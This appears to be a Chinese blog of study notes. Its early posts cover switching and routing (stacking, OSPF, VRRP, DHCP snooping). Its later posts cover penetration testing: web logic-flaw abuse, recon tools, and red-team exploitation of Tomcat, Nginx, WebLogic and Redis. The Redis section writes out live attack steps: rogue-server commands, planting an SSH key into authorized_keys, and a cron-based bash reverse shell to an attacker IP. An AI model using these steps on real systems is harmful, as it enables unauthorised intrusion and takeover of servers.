作者: sigma

发布于

网络设备-堆叠技术:

可靠组网:
1、之前是MSTP+VRRP对网关、破环进行冗余备份。
2、堆叠+链路捆绑(ether-trunk)

什么是堆叠:
多台交换机用线缆连接后组合在一起,虚拟化成一台设备,是一种横向虚拟化技术(核心和核心,接入和接入等),在数据中心中则使用纵向虚拟化(核心和接入组合等)

华为堆叠技术:
CSS(框式交换机)
istack(盒式)
思科堆叠技术:VSS
华三堆叠技术:IRF
锐捷堆叠技术:VSU //各个厂商的堆叠技术不兼容

华为堆叠:登录一台设备就可以操作其他设备,最多可以堆叠9台。若结合跨设备链路聚合技术,可以实现链路的高可靠性备份、避免二层环路。

堆叠中,所有交换机都处于转发状态,分成主、备、从,如下图:

多台交换机堆叠之后,管理上变成一台,且只有一台主交换机。主交换机会进行选举,按照优先级选举。堆叠中只有一台备交换机,其余都是从交换机。登录时不管登录哪个都相当于登录主设备。

堆叠端口:
每台交换机的堆叠端口最多有两个
华为堆叠端口:

堆叠建立流程:


避免堆叠分裂:堆叠双主检测。

堆叠成功后登录哪个交换机都能操作其他交换机的接口,如两台50口交换机堆叠后变成100个。

发布于

ospf-isis(运营商)

1:网络拓扑

登录核心交换机看vlan

登录每一台路由器或者三层交换机看接口,邻居路由

ABR至少有一个接口要连接到骨干区域

自治系统:运行同一个协议,比如整个运行ospf的区域。ASBR说明某个三层交换机或者路由器运行两个自治系统,相当于运行两个协议。

企业用什么管理资产:

堡垒机:

准入:

软件:

cmdb:

管理网络设备(登录):secure CRT:该软件类似xshell方便ssh登录交换机。

ospf 开销计算:既看经过链路多少,也看带宽。

ospf虚链路:特殊情况下,分支单位不与骨干区域相连接。如下图,area 3 不直接与骨干区域相邻,除了abr其他学习不到该区域的路由。

注意到,area 0 一定是骨干区域

上图应该在R2和R3之间打上虚链路:
R2:ospf 1
area 2
vlink-peer 3.3.3.3 //R3的routerid

上图可见,已经学到了4.4.4.4的路由。

ospf邻居建立过程:

互相发送hello-邻居-泛洪LSA(拓扑、路由信息)-LSDB-运行spf算法-生成最优路由-路由表

国家电网、运营商:isis

ospf和isis的应用场景

内部网关协议:ospf isis

外部网关协议:bgp(国家与国家之间)

路由引入:目的:将静态路由引入ospf 或者将ospf引入BGP

如上图:R9运行的rip的路由,省总公司运行着OSPF路由,他们之间是相互学习不到路由的。因此需要引入路由。在R8(ASBR)上引入rip:
[R8]ospf1
[ospf1]import-route rip //即可

但是此时只是单向引入,要想R9也能学习ospf,在R8也引入ospf
[r8]rip 1

[r8-rip-1]import-route ospf 1 //将ospf区域的路由全部引入rip区域

外部引入的路由cost默认为1,而且不会累加。如果只有一个ASBR相当于只有一个出口,所以cost没必要累加,如果有两出口,就会开始累加。

LSA:链路状态广告LSA 是 OSPF 路由器之间交换的信息单元,每个 LSA 包含了关于单个路由器或网络的详细信息。通过交换这些 LSAs,OSPF 路由器能够构建一个完整的网络拓扑图,并使用这个图来计算到达网络中任何位置的最短路径。

封装在LSU里面,有三张表:
1、邻居表:dis ospf peer brief
2、拓扑表(链路状态数据库):dis ospf lsdb
3、路由表:dis ip routing-table

LSA 1型:每个路由器都会发送,自报家门,只在所处的area传播。我是谁,接了谁,有哪些网段。

LSA 2型:只有DR发出,也在所处的area传播。告诉所有人一共有几个网段,通告DR的信息以及所有成员信息。

LSA 3型:ABR发出。可以穿越整个自洽区域(在各个ABR中转) ,在不同区域的ospf信息进行传递。代表网段路由信息。

LSA 4型:ABR进行通告,告诉自治系统ASBR的routeid
dis ospf lsdb
dis ospf lsdb asbr

LSA 5型:ASBR发出,引入其他自治系统的路由信息。

LSA 7型:nssa lsa 特殊区域,nssa的ASBR产生,不接收4、5型LSA
经过ABR后7型转5型 //7型就是披马甲


路由汇总:

在ABR/ASBR上进行路由汇总,将多个网段汇成1个网段:
6.6.6.0/24
6.6.7.0/24
6.6.8.0/24
汇总成6.6.0.0/20 //根据掩码

ospf 1
area 1
abr-summary 6.6.0.0 255.255.240.0 // 但这是在ABR上做的,如果是ASBR则为 asbr-summary 6.6.0.0 255.255.240.0

特殊区域:
1、stub:末节区域,不接收4、5型LSA
在area 中所有路由器都进行配置 [ospf -area-1]stub //所有设备都敲上
此时由于不接收4、5型lsa也就是不接收来自其他自治区域的LSA ,其他末节区域的路由将无法学习,但是依然能访问,原因是自动产生一条0.0.0.0 吓一跳为ASBR的缺省路由。

2、totally-stub:完全末节
[ospf-area1]stub no-summary //不接收3、4、5型LSA

3、NSSA型:不完全末节

4、totaly-nssa

不接收3、4、5 //在totaly-stub基础上 多了一个7转5而已

OSPF路由控制:

IS-IS:

若不同区域都是L2可以构成邻居,不同区域的L12 和L2也能形成L2的邻居。

ISIS路由计算:

如上图,R1想要学习 R4 R5的路由,需要R2 R3生成缺省路由。R2 R3会向R1发送 ATT(附加信息)置1.

ATT=1 的情况:
1、必须是L1/2设备
2、必须有L2邻居
3、必须能接受不同区域的LSP

路由选择:

发布于

(stp:防止回环)MSTP技术(多生成树协议)VRRP(网关备份)

破环技术-生成树

vrrp+mstp 破环冗余

stp:固定时间发送报文,发现环路并阻塞端口。主要就是找根桥。

可靠性企业网:

1、vrrp+mstp(造价小)(公有技术,可以厂商间混用)

2、堆叠技术(推荐)(多虚一、一虚多)多虚一时相当于超融合,多台设备相当于一台设备。

MSTP同域三要素 域名、实例和vlan映射、修订级别。三要素一致才能确定同一个MSTP域。

VRRP:将两个网关虚拟成一个,这两个网关分成主备。主备设备之间互相发送心跳包(3s是最大时间),若某路由器、三层交换机故障,备用变主用,并且发送arp报文刷新接入层交换机的arp表。

不配置的情况下,vvrp的优先级是100.在vvrp中,优先级越大越好。优先级为0时表示设备出现问题不参与竞争,255则表示虚拟网关和实际网关为同一个ip。

mac: 01-00-5e 组播

vvrp封装在IP中,协议号112

虚拟mac地址:虚拟路由器根据vrid生成mac,一个虚拟路由器就拥有一个虚拟mac,格式为00-00-5e-00-01-{vrid}

vrrp联动bfd:在主设备,使用track:
vrrp vrid 1 track interface g0/0/1 //监控接口,如果某接口down,那么优先级默认减少10,但是如果更多设备串联,最好使用bfd。

vrrp负载分担:三层交换机上进行。:

如上图,sw2分别建立vlanif2 到 5,配上地址为254结尾,sw3同样只不过以253结尾,两个sw作为主备,互为对端地址。

[vlanifx]vrrp vrid x v-ip x.x.x.x

[vlanifx]vrrp vrid x p xxx //优先级

检查: [swx]dis vrrp brief

MSTP+VRRP:

所有的交换机:
stp region-configuration
region-name aa
revision-level 1
instance 1 vlan 2 to 3
instance 2 vlan 4 to 5
active region-configuration

随后在核心交换机上:
stp instance 1 root primary
stp instance 2 root secondary

对端上则优先级换过来。 //按照上述方法 此时核心交换机1为主根桥

安全设备会要求数据包来回路径一致,网络设备则不关注来回路径是否一致。

发布于

DHCP 安全防护

1、dhcp snooping :在交换机上只允许DHCP服务器的接口分发的ip地址有效,其他接口认为是无效地址。

2、IPSG ip源防护:在交换机与pc相连接的上联口, ip source check user-bind enable

从该接口的数据检查ip mac vlan,若不符合则丢弃

也可针对某个vlan的所有端口开启

ps:检查的表为dhcp snooping 的表 交换机:dis dhcp snooping user-bind all

开启了源防护后,由于静态ip地址不记录在snooping表项中,因此能限制手动配置的ip访问网络。

被限制后,由于会在接入交换机就被丢弃,连网关都无法访问。

3、由于DHCP snooping 的表项由于是存在内存中,遇到关机则会丢失,应该备份保存。

交换机:dhcp snooping user-bind autosave flash:/xx.tbl snooping表项会保存在该表里。

发布于

new逻辑漏洞

一、越权

方向:1、垂直越权;2、水平越权 ;3、未授权/无级别用户

测试:

1、注册一个合法用户

2、修改用户密码时抓包,修改用户名

3、若成功,发生越权。

未授权:登录后,修改密码时抓包,将cookie删去,若还能执行,则存在未授权漏洞。

难点:判断数据包中与身份相关的字段,修改尝试越权。

打包下载js代码:

工具:packerfuzzer

python .\packerfuzzer.py -u https://x.x.x.x/xxx/xx

支付类型逻辑漏洞:

1、修改价格

2、修改数量

3、替换支付:以A的价格去买B的订单。先生成A的订单但是不支付,相当于修改的产品的其他信息。

优惠卷测试方式:盗用/复用:
盗用:算出优惠券id规律
复用:重复使用优惠券id

机制验证:

验证码突破-回传显示&规律爆破

验证目标-重定向目标&重定向发送

验证逻辑-修改响应包&跳过步骤url

一、验证码:

测试:发送一个错误验证码观察响应包,可能响应包中包含正确的验证码。

爆破要求:验证码能够回显,不限制爆破次数,不限制时间。

测试:注册一个合法的用户。修改或者找回密码时,收到验证码后拦截抓包,修改数据包中的账号相关信息比如邮箱或手机号码,若放行后成功则成功修改其他用户的密码。

二、验证目标:

测试:如果数据包中有外部地址,尝试修改成vps的地址,可能验证码会发改vps中。

三、前端验证绕过响应包

测试:先按照合法流程找回密码并且观察数据包,如记住响应报文状态码都是200。然后重置另外一个用户,由于不知道验证码,先填写错误的验证码进行拦截,抓包。由于bp默认只拦截请求报文不拦截响应报文,在本次测试右键接受响应报文,将合法的报文粘贴替换到非法报文中,若成功则能重置任意用户密码。

插件、工具 验证码:

1、图片验证码-识别插件,用处:登陆爆破&接口枚举

工具:https://www.github.com/smxiazi/NEW_xp_CAPTCHA

乌云文章:

1.支付功能

支付超时:存在类似orderid 和order_userid,同步递增递减尝试遍历。

2.验证码

短信轰炸:复用验证码,替换手机号码实现短信轰炸

密码重置:正常注册一个用户,重置密码,发送验证码验证成功后,先不要输入新的密码提交,在同一个浏览器,输入被测试账号,发送验证码提交,关闭该页面。此时再在原来的重置界面刷新,观察url是否发生变化,发生变化则输入新的密码并且提交,尝试是否能够修改受害用户的密码。 //原理:cookie混淆
发现思路:找回密码流程走到提交新密码阶段后,拦截抓包查看数据细节,寻找可控参数。

发布于

new工具、网站

棱角:有在线工具,提供各类命令参考。如无图形化下载命令等

burp必要插件:

1、apifinder:JS爬取

谷歌插件:

1、wappalyzer:识别网站插件

2、packer-fuzzer:扫描前端代码

#项目插件工具:

https://github.com/ffuf/ffuf

用Go编写的快速 Web 模糊测试程序。

https://github.com/gh0stkey/HaE

HaE是一款网络安全(数据安全)领域下的框架式项目,采用了乐高积木式模块化设计理念,巧妙地融入了人工智能大模型辅助技术,实现对HTTP消息(包含WebSocket)精细化的标记和提取。

https://github.com/Threezh1/JSFinder

一款用作快速在网站的js文件中提取URL,子域名的工具

https://github.com/pingc0y/URLFinder

URLFinder是一款快速、全面、易用的页面信息提取工具

用于分析页面中的js与url,查找隐藏在其中的敏感信息或未授权api接口

https://github.com/rtcatc/Packer-Fuzzer

针对Webpack等前端打包工具所构造的网站进行快速、高效安全检测的扫描工具

https://github.com/shuanx/BurpAPIFinder

攻防演练过程中,我们通常会用浏览器访问一些资产,但很多未授权/敏感信息/越权隐匿在已访问接口过html、JS文件等,通过该BurpAPIFinder插件我们可以:

1、发现通过某接口可以进行未授权/越权获取到所有的账号密码、私钥、凭证

2、发现通过某接口可以枚举用户信息、密码修改、用户创建接口

3、发现登陆后台网址

4、发现在html、JS中泄漏账号密码或者云主机的Access Key和SecretKey

5、自动提取js、html中路径进行访问,也支持自定义父路径访问 …

https://github.com/GerbenJavado/LinkFinder

功能类似于JSFinder,但JSFinder好久没更新了。

https://github.com/ttstormxx/jjjjjjjjjjjjjs

针对webpack站点,爬取网站JS文件,分析获取接口列表,自动结合指纹识别和fuzz获取正确api根,可指定api根地址(针对前后端分离项目,可指定后端接口地址),根据有效api根组合爬取到的接口进行自动化请求,发现未授权/敏感信息泄露,回显api响应,定位敏感信息、敏感文件、敏感接口。支持批量模式。支持需认证接口自动尝试bypass。

https://github.com/momosecurity/FindSomething

该工具是用于快速在网页的html源码或js代码中提取一些有趣的信息的浏览器插件,包括请求的资源、接口的url,请求的ip和域名,泄漏的证件号、手机号、邮箱等信息。

https://github.com/ScriptKid-Beta/Unexpected_information

BurpSuite插件用来标记请求包中的一些敏感信息、JS接口和一些特殊字段,

防止我们疏忽了一些数据包,使用它可能会有意外的收获信息。

发布于

安恒redteam-2(中间件)

一、Tomcat(jsp网站)

弱口令&&部署war包

Vulhub下载yml文件,在kali运行

CVE-2017-12615[put方法]
运行环境:windows 且 开启http put(put默认关闭)
影响版本:apache tomcat 7.0.0-7.0.81
影响范围:(几乎实战中不存在,因为需要人为开启不必要的选项

CVE-2019-0232[CGIServlet命令注入]

CVE-2020-1938[AJP]

弱口令&&部署war包:通用性漏洞-实战存在

War文件:web archive file是网络应用程序的文件格式。由于jsp特性,不像php能直接在www目录下运行,jsp需要中间件进行部署如tomcat,所以该漏洞是tomcat的通用型漏洞。)

如果有上图所示tomcat的展示界面,从manager app 窗口进行登录,从网上找口令尝试。或者访问 http://x.x.x.x:xx/manager/html 进入管理后台(若存在)。
进行暴力破解时,tomcat属于基础验证,在请求头中有经过base64加密的账号口令: tomcat:tomcat //base64加密前,使用bp的爆破模块,将账号字典和密码字典在excel上进行拼接,中间用冒号隔开,然后通过base64加密。

拉取镜像

Tomcat是apache的扩展,开发和调试JSP程序的首选,对应木马类型应该是.JSP脚本。低版本tomcat存在弱口令(<7),而tomcat8没有默认用户,需要管理员通过本地ip修改配置

环境起不来

二、Nginx

CVE-2013-4547[文件名逻辑错误]

起环境

该漏洞在文件名后面加一个空格就可以绕过(linux)

将文件名修改为xx…php[空格] 一样可以发送

通过bp或者edito 010修改hex(16进制数据),png….php中的前两个点为 20 00

接着访问该文件 如test.pnbg…php依然在bp修改hex ..为20 00 放行

可以成功解析php。原因是错误地解析了请求的URI,错误地获取到用户请求的文件名,导致出现权限绕过、代码执行的连带影响。

CVE-201707529[越界读取缓存漏洞]

先启动环境

运行poc,发现获取到了多余的缓存内容

目录穿越

原理:使用了不正确的配置。比如本该通过/file/定向到/home/(取别名,file相当于home),却写成/file缺少/结尾,导致可以/file../造成路径穿越

此时输入../能造成路径穿越

解析漏洞

类似 CVE-2013-4547 nginx调用fastcgi处理“ .php”文件时,若该文件不存在,就会触发修复路径的机制,解析上一层文件,也就是本来是https://ip/test.png/.php,由于该文件不存在,fastcgi进而解析test.png而该文件可以是图片马。

但是!如果php-fpm.conf中的security.limit_extensions指定fastcgi解析文件的类型时,只有该设置为空,也就是管理员未进行配置时,fastcgi才可以将“ .png”文件当成php代码执行

CVE-2019-11043[PHP-FPM远程代码执行漏洞]

三、Apache

CVE-2017-15715[换行解析漏洞]

Apache HTTPD 换行解析漏洞(CVE-2017-15715)

上图为环境成功运行的反馈

如下图,直接上传文件会被拦截

在数据包中加入显示

多后缀解析漏洞

CVE-2021-40438[mod_proxy SSRF]

SSI远程命令执行

CVE-20221-41773[路径穿越]

只有符合该版本并且开cgi开启或cgid开启才可能被利用

上图环境起好了

CVE-2021-42013[路径穿越]

是对cve-2017-41773的绕过

Url二次解析绕过

四、Log4j

CVE-2017-5645[反序列化]

Log4j用于控制日志传输。信息格式级别

CVE-2021044228[JNDI注入]

环境起不来

Redis

Docker pull vertigo/redis4

Docker run -p 6379:6379 vertigo/redis4

1、

redis存在持久化机制,可以自动触发以及手动触发。手动触发可以通过“save”命令触发备份数据库中的数据,可以实现对服务器任意路径写入任意名称任意内容的数据。

利用条件:redis存在未授权:空口令连接。或者口令被爆破能成功连接上redis数据库,还需要开启web服务并且知道web目录的绝对路径。对文件具备读写权限。

  • redis主从复制getshell

原理:一个实例为主,其他示例为从,主负责写,从负责读。

条件。Redis存在未授权等漏洞被成功连接,目标主机和攻击主机网络联通,redis版本4.x、5.x,通过主从写入.so或者dll,使得目标主机执行被写入的命令。

工具:redis-rogue-server

Url:https://github.com/Dliv3/redis-rogue-server

命令:python3 redis-rogue-server.py –rhost=x.x.x.x(目标主机) –rport=6379 –lhost=x.x.x.x(攻击主机)

Windows下redis主从复制DLL劫持Getshell

  1. 工具:https://github.com/r35tart/RedisWriteFile //利用工具
  2. 恶意dll通过webshell调用利用:

Python3 RedisWriteFile.py –rhost x.x.x.x(目标主机) –lhost x.x.x.x(本地主机) –lfile dbghelp.dll –rfile dbghelp.dll

  • 上传木马exe(cs上线木马)到目标主机的C:\\Windows\\Temp目录,该exe需要免杀

Python3 RedisWriteFile.py –rhost x.x.x.x(目标主机) –lhost x.x.x.x(本地主机) –lfile dbghelp.exe –rfile dbghelp.exe –rpath “C:\\Windows\\Temp”

下面是第二步dll生成的方式:

  1. github上找dll-hijacking(https://github.com/rek7/dll-hijacking)
  2. 编辑该dll文件,修改dbghelp_的导出路径,即 dbghelp_=>C:\\Windows\\System32\\dbghelp

Linux系统下的redis

原理:利用Redis写入SSH公钥。Linux的ssh密钥登录功能是通过自带的免密功能生成公钥和对应的私钥,将公钥上传至目标主机特定位置并且特定命名,攻击机可通过私钥ssh连接。

而redis写公钥是将攻击机本机的ssh公钥作为value,然后修改数据库的默认路径为/root/.ssh和默认文件名authorized.keys,把数据备份到authorized.keys中,就可以通过密钥登录。

利用背景:redis能被成功连接且开放ssh,并且redis进程为高权限(写入位置在root)并开启密钥登录认证功能

在实际情况内网环境中,ssh可能不是22端口。

  1. 在kali的~/.ssh目录下输入(root权限): ssh-keygen -t rsa

即在当前目录下生成文件。

  • 生成带有换行符的密钥并传入redis

(echo -e “\n\n”;cat /Users/sven/.ssh/id_rsa.pub;echo -e “\n\n”) > key.txt

Cat key.txt | ./redis-cli -h x.x.x.x -x set xxx

  • Config set dir /root/.ssh/   //设置目录
  • Set dbfilename authorized_keys  //设置文件名
  • Save //保存
  • Ssh -i /Users/sven/.ssh/id_rsa root@x.x.x.x

Redis写入linux计划任务

漏洞原理:将文件写入系统计划任务目录 /var/spool/cron/root文件来执行。Redis操作同写webshell,关键点是将一句话计划任务作为value,通过修改数据库的默认路径为 /var/spool/cron/和默认文件名root,将数据备份到root文件里,系统根据计划任务执行命令(和持久化道理一样)

利用条件:redis能被连接,目标主机能访问攻击机,且目标主机系统为centos,redis进程为高权限(什么叫高权限?)可以设置计划任务。

漏洞利用:连接上redis的情况下:

  1. set xxx “\n\n*/1*****bash -i >& /dev/tcp/攻击机公网ip/443 0>&1\n”   //反弹shell监听443端口
  2. Config set dir /var/spool/cron/
  3. Config set dbfilename root
  4. Save

若不成功,需排查原因如出网的端口可能不是80或者443

Weblogic:(jsp网站)

CVE-2017-10271(前几年护网常见漏洞)weblogic反序列化漏洞

漏洞原理:weblogic server 的wls组件存在缺陷,由wls-wsat.war触发

Weblogic 10.3.6.0存在漏洞较多

CVE-2020-14883/CVE-2020-14882组合漏洞

14883在浏览器url地址栏输入:http://目标主机ip:目标主机端口/console/css/%252e%252e%252fconsole.portal 若成功返回可操作界面证明存在该漏洞。

通过14883可以使用14882进行命令执行getshell。

jboss(jsp网站)

发布于

安恒redteam-1

安恒九维能力:红队突破;橙队赋能;黄队建设;绿队改进;青队处置;蓝队防御;紫队优化;白队管理
ATT&CK:14个攻击内容-215个攻击活动
安恒-红队
攻击流程:
无感知:不直接使用自己的工具、ip等对目标进行扫描,信息打点阶段通过公开的网站、工具如fofa、zoomeye进行测绘;google语法搜索;dns历史解析记录等
情报刺探:访问web服务(http、HTTP),通过插件识别组件、插件信息
漏洞利用:识别出通用的web服务如tomcat,在一些网站如某DB或者msf的exp模块搜可利用漏洞并执行,获取webshell
提权:使用webshell工具连接受害主机后,通过漏洞或不安全的配置进行提权,将普通用户权限提升为管理员权限
横向:以受害主机为跳板机,在内网域之间横向攻击
隧道后门:持久化留后门,dns隧道、vpn隧道、计划任务等
一、开源情报OSINT框架(open source intellingence):
相关URL:
1、https://www.osintframework.com
2、https://4vio.com/osint //可翻译成中文
1、端口扫描:
扫描工具:
nmap 外网资产扫描
url:https://nmap.org
常用参数:
-v //显示扫描过程
-A //进攻式扫描
-nP //不用icmp ping
-Pn //视主机存活直接扫描
–top-ports 100 //扫前100
扫描方式:
-sT //最稳定,三次握手
-sS //默认,无完整握手
-sV //扫描主机和端口的版本
绕过防火墙:
-S //源地址伪装,自定义设置源地址,比如把源地址改成127.0.0.1
-source-port //指定源端口,如53
massan
url:https://github.com/robertdavidgraham/massan
常见参数:
–top-ports 100 //扫描前100
-rate 100000 默认每秒100个包
-iL filename //从文件读取输入
-v //详细输出
2、子域名搜集
工具:
subfinder:(需要go环境)
url:https://github.com/projectdiscover/subfinder
oneforall:(需要python3)
url:https://github.com/shmilylty/Oneforall
命令:python3 oneforall.py –target xxxxx.com run
sublist3r:(python3)
url:https://github.com/aboul3la/sublist3r
命令:python3 sublist3r.py xxxx.com -p53,443,8080
子域名挖掘机:
url:https://www.webshell.cc/6384.html
3、whois/DNS查询
工具:
centralops //whois记录、dns记录
url:https://centralops.net/co/DomainDosasier.aspx
dnsdumpster.com //DNS解析记录-推荐
url:https://dnsdumpster.com
4、ip反查域名
工具:
IP38
url:https://www.ip138.com
5、cdn
工具:
chinaz //查询是否有cdn以及供应商名字
url:https://cdn.chinaz.com
6、数字证书
工具:
censys //查询签名、过期证书等
url:https://search.censys.io/
7、空间测绘
工具:
fofa
shodan
spyse
dnsdb
8、用户名昵称
工具:
sherlock
url:https://github.com/sherlock-project/sherlock
maigret
url:https://github.com/soxoj/maigret
whatsmyname
rocketreach
9、邮件搜集
工具:
hunter //查询邮件后缀
url:https://hunter.io
omail
url:https://omail.io
skymem
url:https://www.skymem.info
infoga //检查邮件是否泄露 python3
url:https://github.com/m4ll0k/infoga
10、临时邮件:
收件:
fakemailgenerator
url:http://www.fakemailgenerator.com
收发、无需注册:
kuku
url:https://m.kuku.lu
11、IP定位
工具:
ipuu //高精度定位ip
url:www.ipuu.net
12、综合搜集
工具:
goby
maltego //kali自带 查询dns解析、子域名、邮箱关联
url:https://www.maltego.com
13、代码信息泄露
工具:
searchcode //各大源码查询源代码泄露 效果好
url:https://searchcode.com
14、密码泄露
工具:
intelx //搜集密码泄露
url:https://intelx.io
14、设备默认密码
工具:
cirt //设备的默认密码
url:https://cirt.net
routerpasswords
url:https://www.roputerpasswords.com
15、历史漏洞
工具:
乌云
url:http://wy.zone.ci

发布于

公众号

杂项:
微信公众号的类别:
·服务号
·订阅号
·企业公众号
·小程序
若企业微信公众号能跳转外部小程序等外部应用的内容,有挖掘潜力否则不必要挖掘。

web应用:
网站php解析、下载的区别,体现在中间件如何解析文件类型(MIME类型)

数据库:
    常规-本地一致
    站库分离-另使用一台服务器的数据库
    站库分离-云数据库应用
网站搭建:子域名
    端口站
    目录站
前后端分离:
    前端:只展示数据,更新通过api
    后端:实际处理数据
    漏洞:   1、前端页面大部分不存在漏洞
            2、后端管理大多在另一个站点(另一个域名)
            3、获取到的权限可能不影响后端
    集成类环境:
        宝塔+phpstudy:由于安装时使用administrator权限安装集成类,导致继承了administrator权限。(宝塔目前相对安全)
            原理:打包类集成化环境,权限配置可能会被控制。
        docker: 
            影响:拿到权限只是docker的权限,不是真正的权限。
            应对:docker逃逸
建站分配站:
    1、托管
    2、申请